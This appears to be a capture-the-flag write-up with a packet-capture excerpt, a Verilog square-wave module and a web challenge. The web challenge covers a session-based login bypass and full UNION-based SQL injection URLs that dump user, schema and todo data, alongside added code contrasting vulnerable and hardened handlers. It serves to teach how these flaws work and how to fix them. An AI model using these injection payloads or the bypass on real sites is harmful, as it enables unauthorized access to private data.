Value: Lady call front desk. I am walk by so I pick up phone. She is ANGRY and shout at me. Say she has never been so insult. I say she probably has but just didn't hear it.
Form item: "submit" = "Submit"
Key: submit
Value: Submit

Frame 312: 911 bytes on wire (7288 bits), 911 bytes captured (7288 bits)
Ethernet II, Src: NorthPol_1f:3c (90:4e:91:20:1f:3c), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.164, Dst: 10.70.84.10
Transmission Control Protocol, Src Port: 33342, Dst Port: 80, Seq: 1, Ack: 1, Len: 845
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Flud"
Key: name
Value: Flud
Form item: "troll_id" = "2083"
Key: troll_id
Value: 2083
Form item: "guest_info" = "Very cranky lady in room 1024"
Key: guest_info
Value: Very cranky lady in room 1024
Form item: "description" = "Lady call front desk. Complain "employee" is rude. Say she is insult and want to speak to manager. Send Flud to room. Lady say troll call her towels thief. I say stop steal towels if is bother her."
Key: description
Value: Lady call front desk. Complain "employee" is rude. Say she is insult and want to speak to manager. Send Flud to room. Lady say troll call her towels thief. I say stop steal towels if is bother her.
Form item: "submit" = "Submit"
Key: submit
Value: Submit

Frame 276: 882 bytes on wire (7056 bits), 882 bytes captured (7056 bits)
Ethernet II, Src: NorthPol_2a:56 (90:4e:91:20:2a:56), Dst: NorthPol_01:26 (90:4e:91:20:01:26)
Internet Protocol Version 4, Src: 10.70.84.38, Dst: 10.70.84.10
Transmission Control Protocol, Src Port: 35796, Dst Port: 80, Seq: 1, Ack: 1, Len: 816
Hypertext Transfer Protocol
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "Yaqh"
Key: name
Value: Yaqh
Form item: "troll_id" = "2796"
Key: troll_id
Value: 2796
Form item: "guest_info" = "Snooty lady in room 1024"
Key: guest_info
Value: Snooty lady in room 1024
Form item: "description" = "Lady call desk and ask for more towel. Yaqh take to room. Yaqh ask if she want more towel because she is like to steal. She say Yaqh is insult. Yaqh is not insult. Yaqh is Yaqh."
Key: description
Value: Lady call desk and ask for more towel. Yaqh take to room. Yaqh ask if she want more towel because she is like to steal. She say Yaqh is insult. Yaqh is not insult. Yaqh is Yaqh.
Form item: "submit" = "Submit"
Key: submit
Value: Submit



Challenge: Frost Tower Website Checkup

I got nerd sniped on this challenge and struggled for a bit before things finally clicked. Asked for help on the Discord and worked with @xstevens quite a bit.


auth bypass 
app.post('/postcontact', function(req, res, next){
    var fullname = xss( ReplaceAnyMatchingWords(req.body.fullname) );
    var email = xss( ReplaceAnyMatchingWords( req.body.email) );
    var phone = xss( ReplaceAnyMatchingWords( req.body.phone) );
    var country = xss( ReplaceAnyMatchingWords( req.body.country ) );
    var date = new Date();
    var d = date.getDate();
    var mo = date.getMonth();
    var yr = date.getFullYear();
    var current_hour = date.getHours();
    var date_created = dateFormat(date, "yyyy-mm-dd hh:MM:ss");

    tempCont.query("SELECT * from uniquecontact where email="+tempCont.escape(email), function(error, rows, fields){

        if (error) {
            console.log(error);
            return res.sendStatus(500);
        }

        var rowlength = rows.length;
        if (rowlength >= "1"){
            session = req.session;
            session.uniqueID = email;
            req.flash('info', 'Email Already Exists');
            res.redirect("/contact");

        } else {

            tempCont.query("INSERT INTO uniquecontact (full_name, email, phone, country, date_created) VALUE (?, ?, ?, ?, ?)", [fullname, email, phone, country, date_created], function(error, rows, fields) {

                if (error) {
                    console.log(error);
                    return res.sendStatus(500);
                }

                res.render('email/e_template_1', { name: fullname }, function (err, data) {

                    // setup email data with unicode symbols
                    var mailOptions = {
                        from: 'Admin <admin@localhost>',
                        to: email,
                        subject: 'Thank you for contacting us!',
                        html: data
                    };

                    //  // send mail with defined transport object
                    //  transporter.sendMail(mailOptions, (error, info) => {
                    //      if (error) {
                    //          return console.log(error);
                    //      }
                    //      console.log('Message sent: %s', info.messageId);
                    //  });

                    session = req.session;
                    req.flash('info', 'Data Saved to Database!');
                    res.redirect("/contact");

                });

            });

        }

    });
});

## login page
app.post('/login', function(req, res, next){

    session = req.session;

    var username = req.body.username;
    var password = req.body.password;

    tempCont.query("SELECT * from users where email="+tempCont.escape(username), function(error, rows, fields){

        if (error) {
            return res.sendStatus(500);
        }

        var rowlength = rows.length;

        if (rowlength >= "1"){

            rows.forEach(function(item){

                var q = bcrypt.compareSync(password, item.password);

                if (q == true){
                    session.uniqueID = req.body.username;
                    session.userfullname = rows['0']['name'];
                    session.userstatus = rows['0']['user_status'];
                    res.redirect('/redirect');
                }else{
                    res.redirect('/redirect');
                }

            });

        }else{
            req.session.destroy(function(){
                res.redirect('/redirect');
            });
        }

    });
});

## logic bug here... gave us access to login: /postcontact sets session.uniqueID whenever the email already exists, and /redirect only checks that session.uniqueID is set (not that a password was ever checked), so submitting the contact form twice with the same email lands you on /dashboard.

app.get('/redirect', function(req, res){
    session = req.session;

    if (session.uniqueID){
        res.redirect('/dashboard');
    } else {
        req.flash('info', 'Invalid Username or Password');
        res.redirect('/login');
    }
});
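As an added example (not the Frost Tower source): the three handlers above modelled in plain JavaScript, vulnerable and hardened side by side, so the two-submission bypass and its fix can be replayed without a server. Express, the database and bcrypt are replaced by in-memory objects and a caller-supplied `checkPassword`; those stand-ins are assumptions.

```javascript
// Added example, not the site's code. Sessions, the contact table and the user table
// are plain objects so this runs offline; the bug and the fix live entirely in how
// "logged in" state is written and read.

// Vulnerable /postcontact: on a duplicate email it writes session.uniqueID,
// the very field /login uses as its "authenticated" marker.
function postcontactVulnerable(session, email, contacts) {
  if (contacts.has(email)) {
    session.uniqueID = email;          // the bug: contact form sets the login marker
    return "Email Already Exists";
  }
  contacts.add(email);
  return "Data Saved to Database!";
}

// Vulnerable /redirect: only asks whether uniqueID is set, not who set it.
function redirectVulnerable(session) {
  return session.uniqueID ? "/dashboard" : "/login";
}

// Hardened /postcontact: never touches session fields that mean "authenticated".
function postcontactFixed(session, email, contacts) {
  if (contacts.has(email)) {
    return "Email Already Exists";
  }
  contacts.add(email);
  return "Data Saved to Database!";
}

// Hardened /login: a dedicated flag is set only after the password check passes.
// checkPassword(password, hash) stands in for bcrypt.compareSync (assumption).
function loginFixed(session, username, password, users, checkPassword) {
  const user = users.get(username);
  if (user && checkPassword(password, user.passwordHash)) {
    session.authenticated = true;
    session.uniqueID = username;
    return "/redirect";
  }
  // On failure clear any earlier state so a stale flag cannot be reused.
  delete session.authenticated;
  delete session.uniqueID;
  return "/redirect";
}

// Hardened /redirect: checks the explicit flag, not a field other routes may set.
function redirectFixed(session) {
  return session.authenticated === true ? "/dashboard" : "/login";
}

// Replay the bypass against both versions and report where each session ends up.
function demo() {
  const contacts = new Set();
  const vulnSession = {};
  postcontactVulnerable(vulnSession, "a@example.com", contacts); // 1st submit: saved
  postcontactVulnerable(vulnSession, "a@example.com", contacts); // 2nd: "exists" + uniqueID set
  const vulnerable = redirectVulnerable(vulnSession);            // "/dashboard", no password

  const contacts2 = new Set();
  const fixedSession = {};
  postcontactFixed(fixedSession, "a@example.com", contacts2);
  postcontactFixed(fixedSession, "a@example.com", contacts2);
  const fixed = redirectFixed(fixedSession);                     // "/login"
  return { vulnerable, fixed };
}
```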

That got us into https://staging.jackfrosttower.com/detail/

The first SQLi: the /detail/ handler splits its parameter on `,` and wraps each piece in m.raw() before "escaping" it, so the escape does nothing but a comma can never appear in the payload. The workaround is to build each column of the UNION row from single-column subselects glued together with JOINs instead of a comma-separated column list.

https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT name as full_name FROM users)UT2 JOIN (SELECT user_status from users)UT3 JOIN (SELECT id as country from users)UT4 JOIN (select email as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id--

encoded:
https://staging.jackfrosttower.com/detail/1,2%20UNION%20SELECT%20*%20FROM%20(SELECT%20id%20FROM%20users)UT1%20JOIN%20(SELECT%20name%20as%20full_name%20FROM%20users)UT2%20JOIN%20(SELECT%20user_status%20from%20users)UT3%20JOIN%20(SELECT%20id%20as%20country%20from%20users)UT4%20JOIN%20(select%20email%20as%20phone%20from%20users)UT5%20JOIN%20(select%20date_created%20from%20users)UT6%20JOIN%20(select%20now()%20as%20date_update%20from%20users)UT7%20ON%20id--
notes from the code:

    if (session.uniqueID){

        try {
            if (reqparam.indexOf(',') > 0){
                var ids = reqparam.split(',');
                reqparam = "0";
                for (var i=0; i<ids.length; i++){
                    query += tempCont.escape(m.raw(ids[i]));
                    query += " OR id="
                }
                // cant use "," so what can we do?
// https://staging.jackfrosttower.com/detail/1,2%20UNION%20SELECT%20*%20FROM%20users--
// https://staging.jackfrosttower.com/detail/1,2%20UNION%20SELECT%20*%20FROM%20users%20where%20token=null--
                query += "?";
            }else{
                query = "SELECT * FROM uniquecontact WHERE id=?"
            }
        } catch (error) {
            console.log(error);
            return res.sendStatus(500);

Lots and lots of selects...

‘get admin’

UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT name as full_name FROM users)UT2 JOIN (SELECT user_status from users)UT3 JOIN (SELECT id as country from users)UT4 JOIN (select email as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id--

‘get all the table names’

https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT table_name as full_name FROM information_schema.tables where table_schema = 'encontact')UT2 JOIN (SELECT email from users)UT3 JOIN (SELECT token as country from users)UT4 JOIN (select user_status as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id LIMIT 10--

https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT column_name as full_name FROM information_schema.columns where table_name = 'todo')UT2 JOIN (SELECT email from users)UT3 JOIN (SELECT token as country from users)UT4 JOIN (select user_status as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id LIMIT 10--

final answer

'santa doesnt want to be a clerk!'
https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM todo)UT1 JOIN (SELECT note as full_name FROM todo where id =9)UT2 JOIN (SELECT note as email from todo)UT3 JOIN (SELECT note as country from todo)UT4 JOIN (select user_status as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id LIMIT 10--
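As an added example, not the site's code: the id handling from the code notes above rebuilt in plain JavaScript beside a hardened version, so you can see exactly what the comma split produces and why integer validation plus bound parameters closes it. The `raw`/`escapeValue` helpers and the leading `SELECT * FROM uniquecontact WHERE id=` string are assumptions standing in for mysqljs and the part of the route the page does not show.

```javascript
// Added example, not the Frost Tower code. raw()/escapeValue() mimic the mysqljs
// behaviour the page's snippet relies on (assumption): escape() returns a raw value's
// SQL untouched, which is what made "escaping" each comma-split piece a no-op.

function raw(sql) {
  // mysqljs-style raw marker: escape() passes it through verbatim
  return { toSqlString: () => String(sql) };
}

function escapeValue(val) {
  if (val && typeof val.toSqlString === "function") return val.toSqlString();
  if (typeof val === "number") return String(val);
  return "'" + String(val).replace(/\\/g, "\\\\").replace(/'/g, "\\'") + "'";
}

// Vulnerable builder, following the shape of the page's snippet: split on ',',
// "escape" each piece (defeated by raw()), glue with " OR id=", end with a bound "0".
// The leading SELECT is assumed; the page only shows the loop.
function buildDetailQueryVulnerable(reqparam) {
  let query = "SELECT * FROM uniquecontact WHERE id=";
  if (reqparam.indexOf(",") > 0) {
    const ids = reqparam.split(",");
    for (const id of ids) {
      query += escapeValue(raw(id)) + " OR id=";
    }
    query += "?";
    return { sql: query, params: ["0"] };
  }
  return { sql: "SELECT * FROM uniquecontact WHERE id=?", params: [reqparam] };
}

// Hardened builder: every id must be a short decimal integer and is passed as a bound
// parameter, so user input never becomes SQL text no matter how it is split.
function buildDetailQueryFixed(reqparam) {
  const ids = String(reqparam).split(",").map((s) => s.trim());
  if (ids.length === 0 || !ids.every((s) => /^\d{1,10}$/.test(s))) {
    return null;                       // reject: answer 400, do not fall through to 500
  }
  const placeholders = ids.map(() => "?").join(", ");
  return {
    sql: `SELECT * FROM uniquecontact WHERE id IN (${placeholders})`,
    params: ids.map((s) => Number(s)),
  };
}
```

Feed both builders the same `1,2 UNION SELECT ...` string: the first emits the UNION as live SQL, the second returns null before any query is built.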


Here is all the dialogue

Buy up land all around Santa's Castle
Build bigger and more majestic tower next to Santa's
Erode Santa's influence at the North Pole via FrostFest, the greatest Con in history
Dishearten Santa's elves and encourage defection to our cause
Steal Santa's sleigh technology and build a competing and way better Frosty present delivery vehicle
Undermine Santa's ability to deliver presents on 12/24 through elf staff shortages, technology glitches, and assorted mayhem
Force Santa to cancel Christmas
SAVE THE DAY by delivering Frosty presents using merch from the Frost Tower Gift Shop to children world-wide... so the whole world sees that Frost saved the Holiday Season!!!! Bwahahahahaha!
With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him



Challenge: FPGA


// Module wrapper added so this compiles on its own; the port list is assumed from the
// signals the block uses (clk, rst, freq, wave_out). The logic itself is unchanged.
module challenge(
    input clk,
    input rst,
    input [31:0] freq,
    output wave_out
);

localparam CLOCK_FREQ = 125000000;
integer counter = 0;
reg sq_wave_reg = 0;
assign wave_out = sq_wave_reg;

always @(posedge clk) begin
    if (rst) begin
        counter <= 32'h00;
        sq_wave_reg <= 1'b0;
    end
    else begin
        // If counter is zero, toggle sq_wave_reg
        if (counter == 32'h00) begin
            sq_wave_reg <= ~sq_wave_reg;
            // generate variable frequency: freq is in hundredths of Hz, so divide by 100 first
            counter <= CLOCK_FREQ / (2 * (freq / 100)) - 1;
        end
        // Else count down
        else
            counter <= counter - 1;
    end
end

endmodule

thanks for reading….